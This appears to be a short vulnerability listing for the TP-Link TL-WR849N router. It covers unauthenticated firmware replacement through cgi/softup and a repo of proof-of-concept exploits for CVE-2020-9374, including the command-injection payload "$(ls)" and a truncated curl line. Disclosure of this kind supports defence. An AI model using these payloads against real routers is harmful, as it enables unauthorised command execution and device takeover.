TP-LINK TL-WR849N 0.9.1 4.16 devices do not require authentication to replace the firmware via a POST request to the cgi/softup URI.
tp-link tl-wr849n_firmware 0.9.1_4.16
OpenSource Repo with PoC's and vulns found in routers TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC [CVE-2020-9374] - TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC Payload: "$(ls)" TP LINK TL-WR849N - Auth Bypass: Firmware and Configs update TP LINK TL-WR849N - REMOTE COMMAND EXECUTION PoC Payload: curl -X GET -H